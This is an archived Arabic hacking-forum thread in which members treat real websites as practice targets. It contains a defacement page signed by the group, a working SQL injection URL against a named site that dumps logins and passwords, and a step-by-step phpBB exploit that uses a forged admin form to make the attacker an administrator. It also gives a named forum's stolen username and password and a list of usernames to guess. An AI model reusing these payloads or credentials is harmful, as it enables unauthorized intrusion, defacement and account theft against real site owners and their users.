:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/forumdisplay.php?f=38)
-   -   [تم تجديد السيرفر] هل تابعت دورة استهداف المواقع ؟ تعال تدرب شوي :) (http://www.vbspiders.com/vb/showthread.php?t=50558)

bleu moon 07-01-2011 11:29 PM

[تم تجديد السيرفر] هل تابعت دورة استهداف المواقع ؟ تعال تدرب شوي :)
 
بسم الله الرحمآن الرحيم

الموضوع ذا جاي بهذف تقوية مهاراتكم في الاستهذاف،

ان شاء الله نبدآ مع اول هذف سهل :)


السيرفر التاني

بشكر حبيب عبد الصمد على السيرفر ان شاء الله نبدآ

ip:64.151.83.138

آندكس الاختراق :)

كود:

<script language="JavaScript">


<!--
 
// Hide the JavaScript from older browsers
(window.*****(" HACKED BY vbspiders_team"))
// End hiding of script
// -->
</script>vbspiders_team</title>
<body text="#00FF00" bgcolor="#000000">

<table border="1" width="100%" id="table2">

    <tr>
        <td bordercolor="#FFFFFF" bordercolorlight="#FF00FF" bordercolordark="#FF0000">

<p align="center">&nbsp;</p>

        <p align="center"><font color="#FFFFFF" face="Tahoma" size="5">
--------------------------------------------------</font></p>
<p align="center" dir="rtl"><font face="Tahoma" size="5">بســم الله الرحمن
الرحـــيم</font></p>
<p align="center" dir="rtl"><font color="#FFFFFF" face="Tahoma" size="5">
--------------------------------------------------</font></p>
        <p>&nbsp;</td>
    </tr>
</table>
<p align="center" dir="rtl">&nbsp;</p>
<p align="center" dir="rtl"><font face="Tahoma" size="5">فريـــق شبـــكة
العنــــاكب الإحتـــرافية</font></p>
<p align="center" dir="rtl"><font face="Tahoma" size="6" color="#FFFF99"><span lang="fr">
vbspiders_team</span></font></p>
<p align="center" dir="rtl"><font color="#00FFFF" size="5" face="Tahoma">
عــــالم الإبداع والمعرفة</font></p>
<p align="center" dir="rtl"><font face="Tahoma" size="7"><span lang="fr">
<a href="http://WwW.vBspidErs.CoM"><font color="#FFFFFF">WwW.</font><font color="#FF0000">v</font><font color="#C0C0C0">B</font><font color="#FFFF00">s</font><font color="#FF00FF">p</font><font color="#800080">i</font><font color="#800000">d</font><font color="#FF9999">E</font><font color="#FF3300">r</font><font color="#00FFFF">s</font><font color="#FFFFFF">.CoM</font></a></span></font></p>
<p align="center" dir="rtl"><font face="Tahoma" color="#FF9900">\ \ \ \ \ \ \ \
\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \
\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ </font><font color="#FF00FF"></p>
<p align="center" dir="rtl">
<font face="Tahoma">
<img border="0" src="http://upload.traidnt.net/upfiles/FsW42876.jpg" width="658" height="646"></font></p>
<p align="center" dir="rtl"><font face="Tahoma" color="#FF9900">\ \ \ \ \ \ \ \
\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \
\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ </font></p>
</font>
<p align="center" dir="rtl"><font face="Tahoma" color="#FFFFFF" size="6">
<span lang="fr">__________________________________</span></font></p>
<p align="center" dir="rtl"><font face="Tahoma" color="#FF0000"><span lang="fr">
<font size="6">هذا الإختــراق</font></span><font size="6"> </font>
<span lang="fr"><font size="6">من اجل صقل مهارات الفريق</font></span></font></p>
<p align="center" dir="rtl"><font face="Tahoma" size="6" color="#FF0000">في
استهذاف المواقع والسيرفرات</font></p>
<p align="center" dir="rtl"><font color="#FFFFFF" face="Tahoma" size="6"><span lang="fr">__________________________________</span></font></p>
<p align="center" dir="rtl">&nbsp;</p>
<p align="center" dir="rtl"><font face="Tahoma" color="#FFFFFF"><span lang="fr">
<font size="5">تم الإختـــراق من قبـــل</font></span><font size="5"> فريق&nbsp;
العنـــاكب </font></font></p>
<p align="center" dir="rtl">
<font size="6" face="Tahoma"><span lang="fr">vbspiders</span>
<span lang="fr">team</span></font></p>
<p align="center" dir="rtl"><span lang="fr">
<font size="5" face="Tahoma" color="#FFFFFF">إهـــداء
الى كـــافة أعضـــاء شبــكة العناكب</font></span></p>
<p align="center" dir="rtl">&nbsp;</p>
<p align="center" dir="rtl">&nbsp;</p>
<p align="center" dir="rtl">&nbsp;</p>
<table border="1" width="100%" id="table1">
    <tr>
        <td>
<p align="center" dir="rtl">&nbsp;</p>
<p align="center" dir="rtl">&nbsp;</p>
<p align="center" dir="rtl"><font size="5" face="Tahoma" color="#FF00FF">سألت الحياة متي تكونين
صديقة لي ....<br>
فجاوبتني عندما يكون الاختراق رفيقا لك</font></p>
<p align="center" dir="rtl">&nbsp;</p>
        <p>&nbsp;</td>
    </tr>
</table>
 
  <script language="JavaScript1.2">             

/*****************************************

* Visit our site at http://www.star28.com/ for more code
* This notice must stay intact for use
***********************************************/           
//change 1 to another integer to alter the scroll speed. Greater is faster             
var speed=1             
var currentpos=0,alt=1,curpos1=0,curpos2=-1             
function initialize(){             
startit()             
}             
function scrollwindow(){             
if (********.all)             
temp=********.body.scrollTop             
else             
temp=window.pageYOffset             
if (alt==0)             
alt=1             
else             
alt=0             
if (alt==0)             
curpos1=temp             
else             
curpos2=temp             
if (curpos1!=curpos2){             
if (********.all)             
currentpos=********.body.scrollTop+speed             
else             
currentpos=window.pageYOffset+speed             
window.scroll(0,currentpos)             
}             
else{             
currentpos=30             
window.scroll(0,currentpos)             
}             
}             
function startit(){             
setInterval("scrollwindow()",30)             
}             
window.onload=initialize             
</script>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>


:grrrrrr:

neo-m 07-01-2011 11:52 PM

ههههه أجل سهلة يا نوردين في ثغرة حقن جاري الحقن

sh-jaf 07-01-2011 11:54 PM

بارك الله فيك
 
شكرا لك أخي nor15din
استخرجت أكثر من موقع مصاب لكن هي هي المشكلة عندي اليوزر و الباس لا يعملان بعد استخراجهم فهل ابعث لك الحقن لتكتشف خطأي
جزاك الله خير .

neo-m 07-02-2011 12:03 AM

تم حقن موقع لكن الباسوورد لا يعمل اضن انه احد ما اخترقه وغير الباسوورد

neo-m 07-02-2011 12:11 AM

في ثغرة اخرى هاهو الاستغلال
كود PHP:

http://www.soussanart.com/artist.php?id=-8+union+select+1,group_concat%28login,0x3a,password%29,3,4,5+from+userkeys 


neo-m 07-02-2011 12:16 AM

تبا ما بها هذه المواقع كل باسورداتها لا تعمل هاذا الموقع ايضا مثل الاول
هذه هي لوحة التحكم
http://www.soussanart.com/cpanel

bleu moon 07-02-2011 12:16 AM

goood jooob :D

sh-jaf 07-02-2011 12:26 AM

لعلو
 
ما بقي إلا أشوف ثغرة في Powered by phpBB © 2001
ان شاء الله نشوف

neo-m 07-02-2011 12:38 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة sh-jaf (المشاركة 347863)
ما بقي إلا أشوف ثغرة في Powered by phpBB © 2001
ان شاء الله نشوف

أجل في ثغرة اخي هاذا هو المنتدى
http://www.cheela.org

وهاذا هو استغلال الثغرة

يجب اولا التسجيل في المنتدى
<font color="Blue" size="6">
ثم احفظ الايد تبعك يعني رقم العضوية
ثم افتح مفكرة جديدة
واكتب فيها هاذا الكود
كود PHP:

<html
<
head
</
head
******> 
 
<
form method="post"  
action="http://www.domain_name/board_directory/adm in/admin_ug_auth.php"
User Level: <select name="userlevel"
<
option value="admin">Administrator</option
<
option value="user">User</option></select
<
input type="hidden" name="private***91;1***93;" value="0"
<
input type="hidden" name="moderator***91;1***93;" value="0"
<
input type="hidden" name="mode" value="user"
<
input type="hidden" name="adv" value=""
User Number: <input type="text" name="u" size="5"
<
input type="submit" name="submit" value="Submit"
 
</
form
</
body
</
html

ثم عدل على الكود بالموقع الذي تريد اختراقه
ضع الموقع في مكان هاذا الرابط
http://www.domain_name
/board_directory

ثم احفض المفكرة بصيغة html

عندما تدخل الى الصفحة التي قمت بحفظها سوف تجد
قائمة والتي يتم اختيار التصريح الذي تريده لتطبيق الثغرة اختر تصريح Administrator
ثم بالمربع الجانبي شع رقم عضويتك بالمنتدى
أضغط زر submit
بعدها سوف تاتيك شاشة تسجيل الدخول ضع اسم المستخدم وكلمة المرور الخاصة بك


neo-m 07-02-2011 12:43 AM

لكن المشكة مضحكة في هاذا الموقع انه لم استطع التسجيل في دائما تظهر لي هذه الرسالة
Votre réponse est inexacte, réessayez Svp.

رابط التسجيلhttp://www.cheela.org/cheelfor/profile.php

neo-m 07-02-2011 12:53 AM

ارجو تثبيت الموضوع لانه مفيد للمبتدئين

neo-m 07-02-2011 12:57 AM

بدات امل لم استطع التسجيل في المنتدى حتى الان يلعن هيك مواقع يقول لك Quel est votre animal de compagnie préféré
وعندما اكتب شيء تظهر هذه
Votre réponse est inexacte, réessayez Svp.

sh-jaf 07-02-2011 12:58 AM

بارك الله فيك
 
جزاك الله خير حصل معي شيء مش فاهم انا دخلت وين عضو او غير ذلك
لكن ممكن تجرب وتقلي
هذا الرابط
http://www.cheela.org
اليوزر vbondoux
الباس alliance
ارجو الرد
و هذه الحقنة
http://www.cheela.org/rav.php?id=-1%...rom+TH_Users--

معاني الفراق 07-02-2011 01:09 AM

جرب التخمين
هذي اليوزرات
arttime
davidger
diaspo
kameo
manitou
lelien
editravl
sourceis
isrtkd


:intello::intello::intello::intello:

abdellatef 07-02-2011 01:16 AM

اخوي نور الدين فكر الادارة بقسم الاستهداف الجميع محتاج لو هدا الصيف لاكتساب مهارات في تخطي الحمايات واستهداف السرفرات
ومتل هدا سيكون بالقسم وضع سرفر ويتم التسابق عليه ويتم عمل شرح لاختراق الهدف


الساعة الآن 11:59 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0